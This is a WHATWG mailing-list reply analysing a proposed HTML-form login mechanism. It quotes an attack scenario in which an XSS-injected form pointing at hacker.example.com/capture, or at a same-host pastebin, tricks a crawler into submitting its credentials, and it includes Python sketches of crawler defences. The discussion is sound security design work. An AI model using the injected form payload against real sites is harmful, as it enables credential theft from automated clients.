[whatwg] Solving the login/logout problem in HTML

Wed Nov 26 13:41:28 PST 2008

On Wed, 26 Nov 2008, Philip Taylor wrote:
> 
> If I'm not misunderstanding things, there is a new attack scenario:
> 
> I post a comment on someone's blog, saying <a 
> href="/restricted-access.php?xsshole=<form 
> action=http://hacker.example.com/capture name=login><input 
> name=username><input name=password></form>">crawl me!</a>
> 
> On their blog's web server, restricted-access.php requires 
> authentication, and unauthenticated access results in a 401 with 
> 'WWW-Authenticate: HTML form="login"' and the appropriate login form. 
> But inevitably there's some kind of XSS hole in that page, so arbitrary 
> markup can be inserted above the real login form. (Maybe they pass an 
> error message in a parameter, which will be displayed above the form, 
> but they forgot to escape the output.)
> 
> Their internal search engine crawler is configured to know a username 
> and password (and the form field names etc) for these restricted areas. 
> It follows the link from my blog comment, it notices the 
> WWW-Authenticate header, and like a good little bot it chooses to parse 
> the HTML page and find the matching form and fill in the fields and 
> submit the login details. But actually it's submitting my XSS-inserted 
> form, and sending the login details to me.
> 
> XSS holes already cause various security vulnerabilities; but they can't 
> currently result in sensibly-written crawlers unwittingly submitting 
> their login details to arbitrary third parties, so this is a new risk.

Hm, this is indeed a problem.
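
To make the scenario concrete, here is a minimal Python sketch of a crawler
that trusts the first form matching the advertised name. The host
blog.example.com, the /login.php action, and the names FormFinder and
naive_login_target are assumptions made up for illustration; only the
injected markup comes from the example above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class FormFinder(HTMLParser):
    """Collect the action attribute of every <form> with the wanted name."""

    def __init__(self, wanted_name):
        super().__init__()
        self.wanted_name = wanted_name
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            attributes = dict(attrs)
            if attributes.get("name") == self.wanted_name:
                self.actions.append(attributes.get("action") or "")


def naive_login_target(page_url, html, form_name):
    """Return the URL a naive crawler would submit its credentials to."""
    finder = FormFinder(form_name)
    finder.feed(html)
    # The flaw: the first matching form is trusted without any further check.
    return urljoin(page_url, finder.actions[0])


# Hypothetical page URL; the injected form is the one from the blog comment.
PAGE_URL = "http://blog.example.com/restricted-access.php"
INJECTED = (
    "<form action=http://hacker.example.com/capture name=login>"
    "<input name=username><input name=password></form>"
)
# Hypothetical genuine login form served with the 401 response.
REAL = (
    '<form action="/login.php" name="login">'
    '<input name="username"><input name="password"></form>'
)
# The unescaped error message places the injected form above the real one.
html = "<p>Error: " + INJECTED + "</p>" + REAL

target = naive_login_target(PAGE_URL, html, "login")
```

Here target ends up pointing at hacker.example.com, because the injected
form appears first in the document.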

> I can imagine a few ways to avoid this problem:
> 
>  1) Don't write any pages with XSS holes.
>  2) Detect tampering by refusing to submit login details if >= 2 forms
> match the name.
>  3) Only submit login details to same-origin URLs, or to some other
> restricted set.
>  4) Configure the crawler with the form submission URL, as well as the
> form field names and values, so it doesn't have to trust the HTML.
>  5) Change WWW-Authenticate so it gives all the details (submission
> URL, field names, etc), so nobody has to trust the HTML.
> 
> But (1) is not going to happen in reality, so we should try to minimise 
> the damage when XSS holes exist. (2) won't work because the attacker 
> could write '...?xsshole=...<!--' and the second form would be hidden. 
> (3) is more sensible; perhaps the spec should explicitly note that you 
> need to be quite careful about not submitting login forms to third-party 
> sites unless you're sure you trust them?

(3) won't work anyway, since sometimes the login form is cross-domain on 
purpose (e.g. OpenID).
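
As a rough illustration of why (3) is too blunt, the following Python sketch
implements a same-origin check on the form action. The function names and
the hosts blog.example.com and openid.example.net are hypothetical. The
check stops the attack above, but it also rejects an intentionally
cross-domain login.

```python
from urllib.parse import urljoin, urlsplit

# Default ports, so that http://host and http://host:80 compare equal.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) triple identifying a URL's origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or DEFAULT_PORTS.get(scheme)
    return (scheme, (parts.hostname or "").lower(), port)


def is_same_origin(page_url, form_action):
    """True if the resolved form action has the same origin as the page."""
    return origin(urljoin(page_url, form_action)) == origin(page_url)


# Hypothetical URL of the page that returned the 401 response.
PAGE_URL = "http://blog.example.com/restricted-access.php"

blocks_attacker = not is_same_origin(PAGE_URL, "http://hacker.example.com/capture")
allows_local = is_same_origin(PAGE_URL, "/login.php")
# A deliberately cross-domain login (hypothetical OpenID provider) is rejected too.
blocks_openid = not is_same_origin(PAGE_URL, "https://openid.example.net/auth")
```

All three flags come out true: the attacker's form is blocked, the local
form is allowed, and the legitimate cross-domain form is blocked as well.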

> But even with (3), I could write <a
> href="/restricted-access.php?xsshole=<form
> action=/public-pastebin.php>..."> and the crawler would send the login
> details to somewhere on the same host where I could still read them
> back, which doesn't seem great.
> 
> So (4) is more sensible. You already have to configure the crawler
> with the form field names, so you might as well tell it what URL to
> submit to, and it shouldn't parse the HTML response or care about the
> <form> element. (Then there's no need for WWW-Authenticate to even say
> what the form name is.)
>
> (5) is basically the same, except it's late-binding the form details 
> rather than hardcoding them into the crawler's configuration, and so it 
> makes it easy to change the server-side login handling without 
> reconfiguring everyone's crawlers.

If we want to go with (4) or (5) then there is no need for this to be 
bound to an HTML form anymore, and we should remove it from the spec.
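
For comparison, a crawler following (4) might look like the Python sketch
below. The LoginConfig type, build_login_request, the URL, and the
credentials are all hypothetical. The point is only that the submission
target comes from the crawler's own configuration, so nothing in the
served HTML can redirect it.

```python
from dataclasses import dataclass
from urllib.parse import urlencode
from urllib.request import Request


@dataclass(frozen=True)
class LoginConfig:
    """Everything the crawler needs to log in, fixed by its operator."""

    submit_url: str  # where the credentials are sent
    fields: dict     # form field names mapped to the values to submit


def build_login_request(config):
    """Build the login POST from configuration alone; no HTML is parsed."""
    body = urlencode(config.fields).encode("ascii")
    return Request(
        config.submit_url,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


# Hypothetical configuration for the restricted area in the example.
config = LoginConfig(
    submit_url="http://blog.example.com/login.php",
    fields={"username": "crawler", "password": "s3cret"},
)
request = build_login_request(config)
```

The request is only built here, not sent. Option (5) would populate the
same structure from the WWW-Authenticate header instead of from static
configuration.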

Is there anyone who can volunteer to edit this section as a separate spec?

I guess I'll remove this section.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'